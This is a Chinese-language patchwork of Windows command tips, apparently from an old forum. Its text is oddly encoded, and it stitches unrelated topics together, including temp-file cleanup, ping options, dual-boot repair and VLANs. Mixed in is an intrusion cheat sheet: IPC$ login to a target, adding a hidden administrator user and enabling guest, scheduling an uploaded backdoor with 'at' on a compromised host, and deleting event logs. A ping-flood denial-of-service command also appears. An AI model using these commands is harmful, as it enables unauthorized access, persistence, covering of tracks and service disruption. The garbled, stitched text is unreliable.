然后到操作系統(tǒng)目錄所在的分區(qū)中!進(jìn)入Winnt(98為windows)目錄(當(dāng)然了,這些都是默認(rèn)的目錄!如果你安裝的時(shí)候改名了,就對(duì)應(yīng)的去相應(yīng)目錄)之后找到Temporary Internet Files目錄(2000的目錄在c:\Documents and settings\administrator\Local settings\Temporary Internet Files)98直接到windows目錄下找Temporary Internet Files就可以了~,找到這個(gè)文件夾后,打開!看到里面有NNNNNNNNNNNN多的文件了么?呵呵,這些是你瀏覽過的網(wǎng)頁(yè)的記錄(有的時(shí)候從網(wǎng)站上面看到漂亮的FLASH,可是不能保存怎么辦?只要在線瀏覽一遍以后,斷線到這里來(lái)找*.swf,之后依次打開查看的話,相信你會(huì)找到你所需要的FLASH的?。昧?,跑題了~繼續(xù)說(shuō):這些文件是網(wǎng)站的頁(yè)面記錄,直接刪除就可以了!
其實(shí)這個(gè)命令主要是用來(lái)看對(duì)方應(yīng)答的速度,如果怎么ping 得到的結(jié)果都是request time out。那恐怕你根本就不用你去找這臺(tái)主機(jī)了,它不在你的射程之內(nèi)。
18)如何查看本機(jī)的DNS服務(wù)器?
ipconfig其實(shí)是可以的(呵呵,上次就介紹過這個(gè)命令),除此以外,還可以利用一個(gè)命令:再cmd下輸入netsh,進(jìn)入到netsh>提示符,再輸入:int ip 進(jìn)入到interface ip> 然后再次輸入dump,這時(shí)候屏幕上出現(xiàn)當(dāng)前連接的配置情況了
net share c$ /delete net share d$ /delete net share e$ /delete net share f$ /delete net share g$ /delete net share ipc$ /delete net share admin$ /delete
IPC連接:格式 net use \\對(duì)方IP\ipc$ "密碼" user:"用戶名" 『建立IPC連接~』 net use \\對(duì)方IP\ipc$ /delete 『斷開連接~』
以下操作需要在連接到對(duì)方主機(jī)后才可進(jìn)行!?。?br> net user coldcrysky xyz /add 『在連接的目標(biāo)主機(jī)中加入一個(gè)用戶名為COLDCRYSKY 密碼為WYZ的用戶』
net localgroup Administrator coldcrysky /add 『把名為coldcrysky的用戶加入ADMIN組-以為著權(quán)限的提高?。。?!^_^』
net use z:\\對(duì)方IP\C$ 『把對(duì)方的C盤映射為本機(jī)的Z盤-可依照需要更改映射盤符!』 net start telnet 『開啟TELNET』 net user guest /active:yes 『激活GUEST』 net user guest coldcrysky 『把GUEST密碼改為COLDCRYSKY』
B、AT命令:
查看遠(yuǎn)程機(jī)時(shí)間:net time \\對(duì)方IP
加入一項(xiàng)新任務(wù):
at \\對(duì)方IP 時(shí)間 文件名 『用來(lái)把自己上傳的后門程序在制定時(shí)間運(yùn)行,方便以后進(jìn)入肉雞!』
『刪除日志的時(shí)候用!』 del c:\winnt\system32\logfiles\*.* del c:\winnt\system32\config\*.evt del c:\winnt\system32\dtclog\*.* del c:\winnt\system32\*.log del c:\winnt\system32\*.txt del c:\winnt\*.txt del c:\winnt\*.log
M、PING命令:
-t :ping制定IP,知道網(wǎng)絡(luò)斷開或按CTRL+C結(jié)束! -a :解釋PING IP的主機(jī)名 -n count :發(fā)送count指定的ECHO數(shù)據(jù)包,默認(rèn)為4個(gè)!
OK,有了這個(gè)前提后,下面就繼續(xù)介紹:那么,net start和net stop到底能開啟什么服務(wù)?其實(shí)這點(diǎn)也不需要你強(qiáng)記,記住這個(gè)命令就可以了:net help start和net help stop,這兩個(gè)會(huì)顯示出你所能開啟的服務(wù)有那些~~
這里比如我們查到了這個(gè)服務(wù)“CLIENT SERVICE FOR NETWARE”,那么當(dāng)這個(gè)命令使用net start和net stop的時(shí)候,你必須在這項(xiàng)服務(wù)上面加上“”,原因是因?yàn)檫@個(gè)服務(wù)名稱中帶有空格!如果服務(wù)名稱中不帶空格,你可以不用帶這個(gè)引號(hào)?。?!這點(diǎn)是我強(qiáng)調(diào)的問題!大家一定不要忘記了!『前些天看到S8S8.net的黑白新區(qū)中有人說(shuō)net start 和 net stop后面的服務(wù)名必須帶空格是錯(cuò)誤的!明白原因了吧?』
27)關(guān)于雙系統(tǒng)的兩個(gè)問題:
A、如何在雙系統(tǒng)(98、2000)中安全刪除2K?
先制作一張Windows 98 的啟動(dòng)軟盤,再用它啟動(dòng)你的計(jì)算機(jī),運(yùn)行sys命令恢復(fù)Windows 98引導(dǎo)記錄后,再運(yùn)行fdisk/mbr恢復(fù)主引導(dǎo)記錄,完成后進(jìn)入Windows 98,把winnt 和system volumn information 目錄刪除,再刪掉C盤上的boot.ini、bootfont.bin、ntldr、nydetect.com、bootsect.dos文件就行了。
2. 按“R”鍵,進(jìn)入“Microsoft Windows XP (TM) 故障恢復(fù)控制臺(tái)”界面;故障恢復(fù)控制臺(tái)提供系統(tǒng)修復(fù)和故障恢復(fù)功能。系統(tǒng)這時(shí)會(huì)搜尋已安裝的Windows XP系統(tǒng)文件,然后顯示搜尋結(jié)果,并詢問“要登錄到哪個(gè)Windows XP安裝(要取消,請(qǐng)按Enter)”,選擇1. D:\Windows,回車,系統(tǒng)會(huì)再詢問“管理員密碼”,再鍵入安裝Windows XP時(shí)設(shè)置的管理員密碼,回車,出現(xiàn)D:\Windows〉,這時(shí)需要輸入修復(fù)命令Fixboot,后面的參數(shù)為啟動(dòng)扇區(qū)要寫入的磁盤盤符,這里填入C:,回車。修復(fù)完成,鍵入Exit退出。重啟后就會(huì)看到久違的雙重啟動(dòng)菜單了。并且,這樣修復(fù)后基本不產(chǎn)生垃圾文件。
位于C:\Program Files\Common Files Microsoft Shared\Msinfo\msinfo32.exe,顯示計(jì)算機(jī)中的有關(guān)系統(tǒng)信息,可用其診斷、解決計(jì)算機(jī)問題并查看遠(yuǎn)程系統(tǒng)所生成的系統(tǒng)報(bào)告。
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list Options: -t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C. 不停的ping地方主機(jī),直到你按下Control-C。 此功能沒有什么特別的技巧,不過可以配合其他參數(shù)使用,將在下面提到。
-a Resolve addresses to hostnames. 解析計(jì)算機(jī)NetBios名。 示例:C:\>ping -a 192.168.1.21 Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data: Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Ping statistics for 192.168.1.21: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms 從上面就可以知道IP為192.168.1.21的計(jì)算機(jī)NetBios名為iceblood.yofor.com。
-n count Number of echo requests to send. 發(fā)送count指定的Echo數(shù)據(jù)包數(shù)。 在默認(rèn)情況下,一般都只發(fā)送四個(gè)數(shù)據(jù)包,通過這個(gè)命令可以自己定義發(fā)送的個(gè)數(shù),對(duì)衡量網(wǎng)絡(luò)速度很有幫助,比如我想測(cè)試發(fā)送50個(gè)數(shù)據(jù)包的返回的平均時(shí)間為多少,最快時(shí)間為多少,最慢時(shí)間為多少就可以通過以下獲知: C:\>ping -n 50 202.103.96.68 Pinging 202.103.96.68 with 32 bytes of data: Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Request timed out. ……………… Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Ping statistics for 202.103.96.68: Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds: Minimum = 40ms, Maximum = 51ms, Average = 46ms 從以上我就可以知道在給202.103.96.68發(fā)送50個(gè)數(shù)據(jù)包的過程當(dāng)中,返回了48個(gè),其中有兩個(gè)由于未知原因丟失,這48個(gè)數(shù)據(jù)包當(dāng)中返回速度最快為40ms,最慢為51ms,平均速度為46ms。
-l size Send buffer size. 定義echo數(shù)據(jù)包大小。 在默認(rèn)的情況下windows的ping發(fā)送的數(shù)據(jù)包大小為32byt,我們也可以自己定義它的大小,但有一個(gè)大小的限制,就是最大只能發(fā)送65500byt,也許有人會(huì)問為什么要限制到65500byt,因?yàn)閃indows系列的系統(tǒng)都有一個(gè)安全漏洞(也許還包括其他系統(tǒng))就是當(dāng)向?qū)Ψ揭淮伟l(fā)送的數(shù)據(jù)包大于或等于65532時(shí),對(duì)方就很有可能擋機(jī),所以微軟公司為了解決這一安全漏洞于是限制了ping的數(shù)據(jù)包大小。雖然微軟公司已經(jīng)做了此限制,但這個(gè)參數(shù)配合其他參數(shù)以后危害依然非常強(qiáng)大,比如我們就可以通過配合-t參數(shù)來(lái)實(shí)現(xiàn)一個(gè)帶有攻擊性的命令:(以下介紹帶有危險(xiǎn)性,僅用于試驗(yàn),請(qǐng)勿輕易施于別人機(jī)器上,否則后果自負(fù)) C:\>ping -l 65500 -t 192.168.1.21 Pinging 192.168.1.21 with 65500 bytes of data: Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254 Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254 ……………… 這樣它就會(huì)不停的向192.168.1.21計(jì)算機(jī)發(fā)送大小為65500byt的數(shù)據(jù)包,如果你只有一臺(tái)計(jì)算機(jī)也許沒有什么效果,但如果有很多計(jì)算機(jī)那么就可以使對(duì)方完全癱瘓,我曾經(jīng)就做過這樣的試驗(yàn),當(dāng)我同時(shí)使用10臺(tái)以上計(jì)算機(jī)ping一臺(tái)Win2000Pro系統(tǒng)的計(jì)算機(jī)時(shí),不到5分鐘對(duì)方的網(wǎng)絡(luò)就已經(jīng)完全癱瘓,網(wǎng)絡(luò)嚴(yán)重堵塞,HTTP和FTP服務(wù)完全停止,由此可見威力非同小可。
-f Set Don`t Fragment flag in packet. 在數(shù)據(jù)包中發(fā)送“不要分段”標(biāo)志。 在一般你所發(fā)送的數(shù)據(jù)包都會(huì)通過路由分段再發(fā)送給對(duì)方,加上此參數(shù)以后路由就不會(huì)再分段處理。
-i TTL Time To Live. 指定TTL值在對(duì)方的系統(tǒng)里停留的時(shí)間。 此參數(shù)同樣是幫助你檢查網(wǎng)絡(luò)運(yùn)轉(zhuǎn)情況的。
-v TOS Type Of Service. 將“服務(wù)類型”字段設(shè)置為 tos 指定的值。
-r count Record route for count hops. 在“記錄路由”字段中記錄傳出和返回?cái)?shù)據(jù)包的路由。 在一般情況下你發(fā)送的數(shù)據(jù)包是通過一個(gè)個(gè)路由才到達(dá)對(duì)方的,但到底是經(jīng)過了哪些路由呢?通過此參數(shù)就可以設(shè)定你想探測(cè)經(jīng)過的路由的個(gè)數(shù),不過限制在了9個(gè),也就是說(shuō)你只能跟蹤到9個(gè)路由,如果想探測(cè)更多,可以通過其他命令實(shí)現(xiàn),我將在以后的文章中給大家講解。以下為示例: C:\>ping -n 1 -r 9 202.96.105.101 (發(fā)送一個(gè)數(shù)據(jù)包,最多記錄9個(gè)路由)
答:VLAN是Virtual Local Area Network的縮寫,即虛擬局域網(wǎng)的意思。VLAN的劃分有三種方式:基于端口(Port)、基于MAC地址和基于IP地址。通過劃分VLAN,可以把數(shù)據(jù)交換限制在各個(gè)虛擬網(wǎng)的范圍內(nèi),從而減少整個(gè)網(wǎng)絡(luò)范圍內(nèi)廣播包的傳輸,提高了網(wǎng)絡(luò)的傳輸效率;同時(shí)各虛擬網(wǎng)之間不能直接進(jìn)行通訊,而必須通過路由器轉(zhuǎn)發(fā),起到了隔離端口的作用,為高級(jí)安全控制提供了可能,增強(qiáng)了網(wǎng)絡(luò)的安全性。VLAN功能的適用性很廣,在數(shù)據(jù)交換較頻繁或?qū)W(wǎng)絡(luò)安全性有要求的環(huán)境均可適用,如:1、在智能小區(qū)、校園、企業(yè)等應(yīng)用環(huán)境,使用VLAN功能可使不同VLAN間的機(jī)器不能互相訪問,可為網(wǎng)絡(luò)安全控制提供良好保障;2、在游戲廳、大中型企業(yè)等環(huán)境,使用VLAN可大大減少網(wǎng)絡(luò)中不必要的數(shù)據(jù)交換的數(shù)量,杜絕廣播風(fēng)暴,提升網(wǎng)絡(luò)傳輸性能。
在網(wǎng)上看到了一篇貼子。I-Worm.Wukill 破壞方法:這個(gè)病毒采用文件夾圖標(biāo),具有很大迷惑性。該病毒運(yùn)行后,會(huì)將自己大量復(fù)制到其他目錄中。 一、 病毒首次運(yùn)行時(shí)將顯示"This File Has Been Damage!";